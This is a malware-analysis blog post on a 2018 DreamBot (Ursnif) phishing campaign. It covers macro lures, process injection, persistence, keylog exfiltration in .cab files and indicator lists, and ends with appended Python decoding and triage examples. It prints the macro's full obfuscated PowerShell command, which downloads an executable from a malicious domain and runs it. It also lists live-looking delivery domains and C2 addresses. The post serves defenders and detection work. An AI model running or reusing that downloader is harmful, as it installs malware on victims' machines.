Blog

DreamBot Campaign Dreams Big

Beginning in April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif.

Luis Mendieta
May 31, 2018
<h3>Summary</h3>
<p>Beginning late April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif. The downloaded DreamBot payload turned out to be a stealthy keylogger, contrary to previously observed behavior from this malware family. The campaign, which has run for several weeks, continually rotated its distribution infrastructure through a variety of domains and IPs. At the time of this writing the campaign is still active.</p>
<h3>Distribution Analysis</h3>
<p>Anomali Labs tracked this campaign by analyzing the document lure and the syntax of the payload download command. For the purpose of this report, the EWS_Inquiry.doc dropper (MD5 b20263ba3773b91bdd947af429e289af) was analyzed. The document lure is a mock Office 365 message enticing the user to click “Enable Editing”, then “Enable Content”, to view the document.</p>
<p><img alt="" src="https://cdn.filestackcontent.com/ctrJ6Ky1R6umjLJORLih"/></p>
<p><em>Figure 1 Malicious Document Lure</em></p>
<p>Malicious macros are a popular choice for attackers because they are relatively easy to create and require limited user interaction (here, the two clicks the lure asks for). EWS_Inquiry.doc contains multiple heavily obfuscated macros with random names. Upon execution, the macro launches PowerShell to issue an HTTP GET request to http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn.</p>
<pre>powershell " ('V'+'SDns'+'adasd ='+' &amp;(8n'+'7'+'n8n7'+'+8n7e'+'8n'+'7+8n'+'7w-o'+'bje'+'c8n7+8n7t8n7'+') ra'+'nd'+'om;VSDYYU '+'='+' .(8n7ne'+'8n7+8n'+'7w8n7+8n7-ob'+'ject8n7) Syste'+'m.N'+'et.W'+'eb'+'Clie'+'nt;'+'VSD'+'NS'+'B'+' '+'='+' '+'VSDns'+'a'+'dasd.'+'next(1'+'0000'+', 2821'+'33);VS'+'D'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'+' (8n7.ex'+'8n'+'7+8n7e8n7);f'+'or'+'ea'+'c'+'h'+'(V'+'SD'+'asf'+'c '+'in VS'+'DAD'+'CX){'+'tr'+'y{VSD'+'YYU.xPr'+'D'+'oKcVW'+'nl'+'KcVOa'+'dF'+'IKcVl'+'exPr(V'+'S'+'D'+'asfc.xPrToStrK'+'cViKc'+'VNg'+'xPr(), VS'+'DS'+'DC'+')'+';&amp;(8n'+'7Invo8n7+8n7k8'+'n7+8n7'+'e-Item8n7'+')'+'(VS'+'D'+'SDC'+');'+'b'+'r'+'eak;}c'+'a'+'tc'+'h{}'+'}').RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`').RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39).RePlacE('wZU','\').RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34).RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$') |&amp; ((vARiaBLe '*mdr*').NAmE[3,11,2]-JoIN'')</pre>
<p><em>Figure 2 PowerShell Command to Download Payload</em></p>
<p>The command assembles its real script from string fragments, then undoes a chain of placeholder substitutions (KcV for a backtick, 8n7 for a single quote, wZU for a backslash, xPr for a double quote and VSD for $) and pipes the result into Invoke-Expression, whose alias iex is spelled out from characters 3, 11 and 2 of the name of the automatic variable MaximumDriveCount, the variable that matches the wildcard *mdr*. The backticks left inside the method names ("Do`Wnl`OadFI`le", "ToStr`i`Ng") are no-op escapes that keep the strings DownloadFile and ToString out of the command as written. The decoded script creates a System.Net.WebClient, downloads the URL to C:\Users\Public\{number}.exe, where {number} is a random integer from Random.Next(10000, 282133), and runs it with Invoke-Item. The Public profile directory is writable by every user, so a freshly written .exe there is a useful hunting condition on its own.</p>
<h3>Technical Analysis</h3>
<p><strong>Host Indicators</strong></p>
<p>The DreamBot implant we observed has close similarities to the variants reported by Proofpoint analysts (see Footnote 1). Perhaps the most interesting characteristic of this variant is its flow of execution. First, the PowerShell script executes the downloaded payload, which spawns a child process. Next, the child process executes the legitimate Windows utility “control.exe”. The implant payload injects code into the “control.exe” process space, and the injected code then creates a series of registry keys that are consistent with DreamBot. Figure 3 below shows the created keys:</p>
<p><img alt="" src="https://cdn.filestackcontent.com/Xr4sX9vfQGiKRDlHL46i"/></p>
<p><em>Figure 3 Registry keys created by Control.exe</em></p>
<p>The registry keys seen in Figure 3 are located at the following paths:</p>
<pre>HKCU\SOFTWARE\AppDataLow\Software\Microsoft\{Random id number}
HKCU\SOFTWARE\AppDataLow\Software\Microsoft\Client</pre>
<p>During the next step of the execution chain, control.exe injects code into the explorer.exe process space. When the injected code starts running inside explorer.exe, it installs a persistence mechanism under the HKCU\...\CurrentVersion\Run key. See the registry value below:</p>
<pre>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dprfest = [path of payload]</pre>
<p>Because the persistence value is written from explorer.exe rather than from the dropped executable, a detection that keys only on which process writes Run values will attribute the change to Explorer; the value name and the payload path are the reliable indicators. The memory space of the explorer.exe process contained several domains related to the compromise. We also observed full URLs used for C2 communications, as can be seen in the figure below:</p>
<p><img alt="" src="https://cdn.filestackcontent.com/aADYGMMyTkyYGIlEu6vq"/></p>
<p><em>Figure 4 Explorer.exe memory strings</em></p>
<p><strong>Network Communications</strong></p>
<p>This variant of DreamBot communicates over HTTPS. Anomali Labs intercepted the TLS traffic to uncover the transmitted data. Analysis of the HTTPS requests revealed the upload of small Windows .cab files with the naming convention [A-Z0-9]{4}\.bin; the .bin extension is cosmetic, and the MSCF signature at the start of the body identifies the format. Figure 5 below shows the decrypted HTTPS request:</p>
<p><img alt="" src="https://cdn.filestackcontent.com/uq0mKAmKTkuSLT8iL6Jv"/></p>
<p><em>Figure 5 Decrypted HTTPS request</em></p>
<p>We analyzed the exfiltrated .cab files and discovered they were actually keylog files. Figure 6 below demonstrates the content of one of these files:</p>
<p><img alt="" src="https://cdn.filestackcontent.com/akzs2HaRbqR8jMtTaRpu"/></p>
<p><em>Figure 6 Keylog Data</em></p>
<h3>Conclusion</h3>
<p>Anomali Labs’ research of this DreamBot campaign identified significant developments in recent DreamBot deployment.</p>
<ul>
<li>Injecting twice (payload into control.exe, then control.exe into explorer.exe) is unusual and complicates analysis: the code under study leaves the process the debugger is attached to, so the analyst must follow execution into a process they are not debugging, which means monitoring the injection-related Windows API calls rather than relying on ordinary breakpoints.</li>
<li>The use of DreamBot as a keylogger differs from DreamBot’s previous usage as a banking trojan. This could indicate that the attackers are broadening the scope of this campaign beyond banking credentials.</li>
</ul>
<p>Anomali Labs will continue to track this campaign and provide our clients with updated IOCs and reporting.</p>
<h3>Indicators of Compromise</h3>
<p><strong>DreamBot Delivery</strong></p>
<pre>14ca1s5asc45.com
tttiweqwneasdqwe.com
g98d4qwd4asd.com
hhhasdnqwesdasd.com
qqwqwwwpoasd.com
asldkjasndqweasd.com
iiasjdqwjenqasdnq.com
eertasidasnqweas.com
sdjqiweqwnesd.com
sdf5wer4wer.com
oooiawneqweasd.com
aninsnasdneqwe.com
ppoadajsqwenqw.com
yyjqnwejqnweqweq.com
jjasdkeqnqweqwe.com
oooiasndqjwenda.com
kkjkajsdjasdqwec.com
uuuansdownew.net</pre>
<p><strong>DreamBot Command and Control</strong></p>
<pre>86.105.1.151
carforklou.at
51.254.172.105</pre>
<p>1. https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality</p>
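The Figure 2 command can be decoded statically rather than executed. The Python below is an added example, not Anomali's tooling and not code from the page: it applies to the captured command the same transformations the command applies to itself (fragment concatenation, the chain of .Replace() calls, the MaximumDriveCount index trick), folds the remaining 'a'+'b' literal concatenations, strips the no-op backticks, and pulls the download URL and drop-file naming scheme out of the result. STAGE1 is the concatenated string transcribed from Figure 2; the wZU-to-backslash mapping is reconstructed from the drop path C:\Users\Public\{number}.exe given in the text, since the page's rendering lost backslashes.

```python
"""Static decoder for the Figure 2 PowerShell one-liner (added example, not Anomali's code).

STAGE1 is the result of the command's own 'a'+'b'+... concatenation, transcribed from
the page. REPLACEMENTS mirrors its five .Replace() calls in order; the wZU entry is read
as a backslash because the page gives the drop path as C:\\Users\\Public\\{number}.exe.
"""
import re

STAGE1 = (
    "VSDnsadasd = &(8n7n8n7+8n7e8n7+8n7w-objec8n7+8n7t8n7) random;"
    "VSDYYU = .(8n7ne8n7+8n7w8n7+8n7-object8n7) System.Net.WebClient;"
    "VSDNSB = VSDnsadasd.next(10000, 282133);"
    "VSDADCX = 8n7 http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn8n7.Split(8n7@8n7);"
    "VSDSDC = VSDenv:public + 8n7wZU8n7 + VSDNSB + (8n7.ex8n7+8n7e8n7);"
    "foreach(VSDasfc in VSDADCX){try{VSDYYU.xPrDoKcVWnlKcVOadFIKcVlexPr("
    "VSDasfc.xPrToStrKcViKcVNgxPr(), VSDSDC);"
    "&(8n7Invo8n7+8n7k8n7+8n7e-Item8n7)(VSDSDC);break;}catch{}}"
)

# The .RePlacE() chain in the order the command applies it. The [CHAr] sums decode as
# 75/99/86 = "KcV", 56/110/55 = "8n7", 120/80/114 = "xPr", 86/83/68 = "VSD".
REPLACEMENTS = [("KcV", "`"), ("8n7", "'"), ("wZU", "\\"), ("xPr", '"'), ("VSD", "$")]

# Only these letters form real escape sequences after a backtick in PowerShell; a backtick
# before any other character (as in "Do`Wnl`OadFI`le") is a no-op that merely keeps the
# literal string DownloadFile out of the command text.
REAL_ESCAPES = re.compile(r"`[0abefnrtuv]")


def resolve_invoke_alias(variable_name="MaximumDriveCount"):
    """(variable '*mdr*').Name[3,11,2] -join '': MaximumDriveCount is the automatic
    variable matching *mdr*; characters 3, 11 and 2 spell the Invoke-Expression alias."""
    return "".join(variable_name[i] for i in (3, 11, 2))


def fold_literal_concat(script):
    """('ne'+'w'+'-object') -> 'new-object' (single-quoted literals only, no variables)."""
    pat = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")
    return pat.sub(lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", script)


def strip_noop_backticks(script):
    """Remove escape backticks, refusing to touch a script that contains a real escape."""
    if REAL_ESCAPES.search(script):
        raise ValueError("script contains a real escape sequence; do not strip blindly")
    return script.replace("`", "")


def deobfuscate(stage1=STAGE1, replacements=REPLACEMENTS):
    """Undo the placeholder substitutions, then tidy the result for reading."""
    script = stage1
    for placeholder, real in replacements:   # same order as the .Replace() chain
        script = script.replace(placeholder, real)
    return strip_noop_backticks(fold_literal_concat(script))


def extract_iocs(script):
    """Download URL(s) and the drop-file naming scheme from the decoded script."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    rng = re.search(r"\.next\((\d+),\s*(\d+)\)", script)   # Random.Next(min, max): max is exclusive
    lo, hi = (int(rng.group(1)), int(rng.group(2)) - 1) if rng else (None, None)
    return {"urls": urls, "drop_dir": "$env:public", "name_range": (lo, hi), "ext": ".exe"}


if __name__ == "__main__":
    decoded = deobfuscate()
    print(decoded, "|", resolve_invoke_alias())
    print(extract_iocs(decoded))
```

The decoded script reads as a plain WebClient.DownloadFile into $env:public followed by Invoke-Item, which is why the drop path and the random-number file name are stable indicators even though every string in the delivery command is obfuscated. The REAL_ESCAPES guard matters when reusing this on other samples: a backtick before n, t or 0 changes the string, so the strip is refused rather than applied silently.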
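The Network Communications section identifies the uploads as cabinet files carrying a .bin name. Rather than trusting the extension, an analyst working from intercepted TLS traffic can confirm the format and recover the keylog from the body. The Python below is an added example, not Anomali's code: it checks the upload name against the [A-Z0-9]{4}\.bin convention, validates the MSCF header, walks the CFFOLDER, CFFILE and CFDATA structures, and extracts the members of an uncompressed cabinet. The sample cabinet and the keylog text inside it are constructed here for the demonstration; compressed (MSZIP/LZX) folders are detected but not unpacked.

```python
"""Triage of the DreamBot .bin uploads (added example, not Anomali's code).

Checks the upload name against the campaign's [A-Z0-9]{4}.bin convention, confirms the
body is a Microsoft Cabinet (MSCF), and extracts the member files of an uncompressed
cabinet. The sample cabinet below is constructed inline; its keylog text is made up.
"""
import re
import struct

NAME_RE = re.compile(r"^[A-Z0-9]{4}\.bin$")
CFHEADER = struct.Struct("<IIIIIBBHHHHH")   # everything after the 4-byte MSCF signature
CFFOLDER = struct.Struct("<IHH")            # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")           # cbFile, uoffFolderStart, iFolder, date, time, attribs
CFDATA = struct.Struct("<IHH")              # csum, cbData, cbUncomp


def build_flat_cab(members):
    """Construct a single-folder, uncompressed cabinet from {name: bytes} (sample input only)."""
    payload, files, offset = b"", b"", 0
    for name, data in members.items():
        files += CFFILE.pack(len(data), offset, 0, 0, 0, 0x20) + name.encode("ascii") + b"\0"
        payload += data
        offset += len(data)
    coff_files = 4 + CFHEADER.size + CFFOLDER.size
    coff_data = coff_files + len(files)
    data_block = CFDATA.pack(0, len(payload), len(payload)) + payload
    total = coff_data + len(data_block)
    header = b"MSCF" + CFHEADER.pack(0, total, 0, coff_files, 0, 3, 1, 1, len(members), 0, 0, 0)
    return header + CFFOLDER.pack(coff_data, 1, 0) + files + data_block


def parse_cab(blob):
    """Return folders and file entries; raises ValueError if blob is not a cabinet."""
    if blob[:4] != b"MSCF":
        raise ValueError("no MSCF signature")
    (_, cb_cabinet, _, coff_files, _, _minor, _major, c_folders, c_files,
     flags, _set_id, _i_cab) = CFHEADER.unpack_from(blob, 4)
    if flags & 0x7:   # prev/next cabinet or reserve fields shift the offsets; not handled here
        raise ValueError("multi-part or reserved-field cabinet not handled")
    if cb_cabinet != len(blob):
        raise ValueError("cbCabinet %d does not match body length %d" % (cb_cabinet, len(blob)))
    folders = [CFFOLDER.unpack_from(blob, 4 + CFHEADER.size + i * CFFOLDER.size)
               for i in range(c_folders)]
    files, off = [], coff_files
    for _ in range(c_files):
        cb, uoff, ifolder, _date, _time, attribs = CFFILE.unpack_from(blob, off)
        off += CFFILE.size
        end = blob.index(b"\0", off)
        files.append({"name": blob[off:end].decode("utf-8" if attribs & 0x80 else "latin-1"),
                      "size": cb, "offset": uoff, "folder": ifolder})
        off = end + 1
    return {"folders": folders, "files": files}


def extract_members(blob):
    """Recover member contents from an uncompressed cabinet (typeCompress 0 only)."""
    cab = parse_cab(blob)
    folder_bytes = []
    for coff_start, c_data, type_comp in cab["folders"]:
        if type_comp & 0xF:
            raise ValueError("compressed folder (MSZIP/LZX); use a real CAB extractor")
        chunk, off = b"", coff_start
        for _ in range(c_data):
            _csum, cb_data, _cb_uncomp = CFDATA.unpack_from(blob, off)
            off += CFDATA.size
            chunk += blob[off:off + cb_data]
            off += cb_data
        folder_bytes.append(chunk)
    return {f["name"]: folder_bytes[f["folder"]][f["offset"]:f["offset"] + f["size"]]
            for f in cab["files"]}


def triage_upload(filename, body):
    """True when the upload matches the campaign pattern: 4-char .bin name and a CAB body."""
    return bool(NAME_RE.match(filename)) and body[:4] == b"MSCF"


# Constructed sample: a cabinet holding made-up keylog text, uploaded under the name 7Q2K.bin.
SAMPLE_CAB = build_flat_cab({"log.txt": b"[notepad.exe]\r\nuser typed: hunter2\r\n"})

if __name__ == "__main__":
    print(triage_upload("7Q2K.bin", SAMPLE_CAB), extract_members(SAMPLE_CAB))
```

In a proxy or IDS rule the useful combination is the two checks together: a four-character upper-case alphanumeric name ending in .bin is cheap to match, and the MSCF signature in the request body (visible only after TLS interception, as in Figure 5) confirms the content. Real DreamBot uploads may use compressed folders, in which case extract_members stops at the typeCompress check and the body should be handed to a full cabinet extractor.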
Luis Mendieta

Luis Mendieta is a former Senior Security Researcher at Anomali.